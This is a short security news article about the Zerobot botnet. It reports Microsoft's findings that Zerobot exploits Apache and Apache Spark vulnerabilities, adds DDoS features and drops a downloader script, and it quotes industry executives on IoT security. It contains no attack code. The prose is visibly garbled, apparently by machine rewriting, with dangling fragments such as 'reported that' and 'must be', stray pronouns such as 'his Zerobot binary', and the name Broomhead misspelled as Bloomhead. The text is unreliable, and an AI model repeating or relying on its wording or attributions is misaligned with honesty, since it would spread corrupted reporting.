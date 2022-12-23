



In addition to exploiting vulnerabilities in Apache, Zerobot also has new DDoS attack capabilities, according to Microsoft researchers. (Photo by Stephen Lam/Getty Images)

Microsoft researchers found that the latest distribution of Zerobot includes additional features such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively) and new DDoS attack capabilities. reported that

In a December 21st blog post, Microsoft Security Threat Intelligence (MSTI) researchers described Zerobot as a Go-based botnet that spreads primarily through vulnerabilities in IoT and web applications.

According to MSTI, Zerobot injects a malicious payload once it gains device access. This could be a generic script called zero.sh that downloads Zerobot and tries to run it, or a script that downloads his Zerobot binary for a specific architecture.

According to the researchers, the script that attempts to download various Zerobot binaries will attempt to brute force the architecture, downloading and executing binaries of various architectures until it succeeds.

Viakoo CEO Bud Broomhead says the way Zerobot and other botnet armies are formed is a serious problem. Broomhead also added that the size, frequency and duration of DDoS attacks have increased by more than 90% year-over-year. This is because the spread of bots like Zerobot is largely unchecked.

According to Bloomhead, attackers always launch attacks where defenses are weakest and where exploits are most likely. This is exactly what his IoT and OT devices offer today. Many cyber defenses rely on agent-based technology to protect IT systems. IoT/OT devices cannot accept agents, so IT-oriented solutions are not effective in stopping threats like his Zerobot.

Coalfire vice president Andrew Barratt said malware with the ability to affect IoT devices should raise eyebrows among security teams. Barratt said the findings could shed light on everything from a privacy standpoint to more serious life implications.

Imagine malware that manipulates your heating system in exchange for ransomware-style payments, says Barratt. Security teams and end-consumers of IoT devices should avoid exposing IoT devices directly to the internet by locking down the devices and preferably firewalling the affected ports to prevent them from easily connecting to each other. must be

